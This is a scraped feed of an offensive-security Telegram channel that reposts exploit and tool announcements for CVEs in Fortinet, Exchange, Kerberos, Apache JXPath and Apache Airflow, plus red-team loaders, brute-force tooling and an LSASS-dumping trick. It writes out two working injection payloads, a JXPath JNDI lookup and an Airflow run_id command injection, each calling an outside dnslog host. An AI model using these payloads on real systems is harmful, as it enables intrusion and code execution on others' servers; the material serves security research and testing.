Forwarded from Offensive Xwitter
😈 [ pdiscoveryio, ProjectDiscovery.io ]
The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris
https://t.co/2GY3QZlTft
#hackwithautomation #cybersecurity #infosec #bugbounty
🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/
🐥 [ tweet ]
The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris
https://t.co/2GY3QZlTft
#hackwithautomation #cybersecurity #infosec #bugbounty
🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/
🐥 [ tweet ]
❤🔥3🔥1
😈 Fortinet RCE (CVE-2022-40684)
Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system.
Shodan Dork:
product:"Fortinet FortiGate"
Research:
https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/
PoC:
https://github.com/horizon3ai/CVE-2022-40684
Detection for SOC:
https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
#fortinet #rce #research #poc #exploit
Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system.
Shodan Dork:
product:"Fortinet FortiGate"
Research:
https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/
PoC:
https://github.com/horizon3ai/CVE-2022-40684
Detection for SOC:
https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
#fortinet #rce #research #poc #exploit
Horizon3.ai
FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)
Fortinet recently patched a critical authentication bypass vulnerability that gives an attacker the ability to login as an administrator,
🔥8👍5
⌛ Attacking Predictable GUID
Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens.
https://www.intruder.io/research/in-guid-we-trust
#web #pentest #guid #account #takeover
Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens.
https://www.intruder.io/research/in-guid-we-trust
#web #pentest #guid #account #takeover
www.intruder.io
In GUID We Trust
GUIDs (often called UUIDs) are widely used in modern web applications. However, seemingly very few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one.
❤🔥4
📄 Detecting ADCS Web Services Abuse (ESC8)
One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself.
https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36
#adcs #detection #esc8 #blueteam
One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself.
https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36
#adcs #detection #esc8 #blueteam
Medium
FalconFriday — Detecting ADCS web services abuse — 0xFF20
One of the popular attack vectors against ADCS is ESC8 — relaying NTLM creds to the ADCS HTTP(S) endpoints. While preventing this…
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🔑 YubiKeys Relaying Attack
That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards.
Research:
Relaying YubiKeys Part 1
Relaying YubiKeys Part 2
Tools:
https://github.com/cube0x0/YubiKey-Relay
#ad #2fa #fido2 #ybikeys
That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards.
Research:
Relaying YubiKeys Part 1
Relaying YubiKeys Part 2
Tools:
https://github.com/cube0x0/YubiKey-Relay
#ad #2fa #fido2 #ybikeys
👍5
Forwarded from Offensive Xwitter
😈 [ dafthack, Beau Bullock ]
Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView:
https://t.co/ZItkN8BjZ9
And here's one for Azure AD:
https://t.co/IcCHRYPrE5
🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4
🐥 [ tweet ][ quote ]
Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView:
https://t.co/ZItkN8BjZ9
And here's one for Azure AD:
https://t.co/IcCHRYPrE5
🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4
🐥 [ tweet ][ quote ]
👍5
⚙️ Apache Commons Jxpath (CVE-2022-41852)
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
👍9🔥2
🌀 Unique Subdomain Enumeration
Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns
Research:
https://cramppet.github.io/regulator/index.html
Tools:
https://github.com/cramppet/regulator
#subdomain #enumeration #permutation #tools
Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns
Research:
https://cramppet.github.io/regulator/index.html
Tools:
https://github.com/cramppet/regulator
#subdomain #enumeration #permutation #tools
👍9🔥3
Forwarded from Информационная безопасность
Phishing campaigns
Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться
Link: https://github.com/wddadk/Phishing-campaigns
#apt #git #phishing
Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться
Link: https://github.com/wddadk/Phishing-campaigns
#apt #git #phishing
GitHub
GitHub - wddadk/Phishing-campaigns
Contribute to wddadk/Phishing-campaigns development by creating an account on GitHub.
👍9🔥5
🔑 Abuse Kerberos RC4 (CVE-2022-33679)
This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.
Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
Exploit:
https://github.com/Bdenneu/CVE-2022-33679
#ad #kerberos #rc4 #exploit
This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.
Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
Exploit:
https://github.com/Bdenneu/CVE-2022-33679
#ad #kerberos #rc4 #exploit
🔥6👍2
⚔️ Katana — Web Crawler
A next-generation crawling and spidering framework.
Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control
https://github.com/projectdiscovery/katana
#web #crawler #tools #bugbounty
A next-generation crawling and spidering framework.
Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control
https://github.com/projectdiscovery/katana
#web #crawler #tools #bugbounty
❤🔥12
Bash Aliases for CrackMapExec Modules
CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command.
As a bonus, I've implemented an Alias for the
Just include these lines in your
Aliases:
CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command.
As a bonus, I've implemented an Alias for the
bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you.Just include these lines in your
~/.zshrc or ~/.bashrc and enjoy.Aliases:
alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf'
alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf'
#cme #bash #alias #bloodhound #audit #masking❤🔥6👍1
⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks
This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more.
https://github.com/t3l3machus/psudohash
#wordlist #password #generator #bruteforce
This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more.
https://github.com/t3l3machus/psudohash
#wordlist #password #generator #bruteforce
👍7🔥5
Forwarded from Offensive Xwitter
😈 [ ShitSecure, S3cur3Th1sSh1t ]
I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩
🐥 [ tweet ]
I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩
🐥 [ tweet ]
🔥13😁4
🛠 DynamicSyscalls
This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking).
https://github.com/Shrfnt77/DynamicSyscalls
#maldev #csharp #syscall #library
This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking).
https://github.com/Shrfnt77/DynamicSyscalls
#maldev #csharp #syscall #library
GitHub
GitHub - Shrfnt77/DynamicSyscalls: DynamicSyscalls is a library written in .net resolves the syscalls dynamically (Has nothing…
DynamicSyscalls is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking) - Shrfnt77/DynamicSyscalls
👍2🔥1
🥷 PNG Steganography Hides Backdoor
Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha).
https://decoded.avast.io/martinchlumecky/png-steganography/
#maldev #steganography #png
Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha).
https://decoded.avast.io/martinchlumecky/png-steganography/
#maldev #steganography #png
🔥5
💤 laZzzy
This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.
Features:
— Direct syscalls and native functions;
— Import Address Table (IAT) evasion;
— Encrypted payload (XOR and AES);
— PPID spoofing;
— Blocking of non-Microsoft-signed DLLs;
— etc.
https://github.com/capt-meelo/laZzzy
#maldev #loader #cpp #redteam
This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.
Features:
— Direct syscalls and native functions;
— Import Address Table (IAT) evasion;
— Encrypted payload (XOR and AES);
— PPID spoofing;
— Blocking of non-Microsoft-signed DLLs;
— etc.
https://github.com/capt-meelo/laZzzy
#maldev #loader #cpp #redteam
👍5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Новые сюрпризы в AD CS... Добавим технику ESC11🙈
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#ad #pentest #redteam
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#ad #pentest #redteam
💣 ProxyNotShell PoC
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.iss.one/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.iss.one/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce
🔥7👍1
💨 Apache Airflow RCE
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
2. Run ID parameter
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
example_bash_operator at DAGs2. Run ID parameter
{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}
#apache #airflow #dags #rce❤🔥5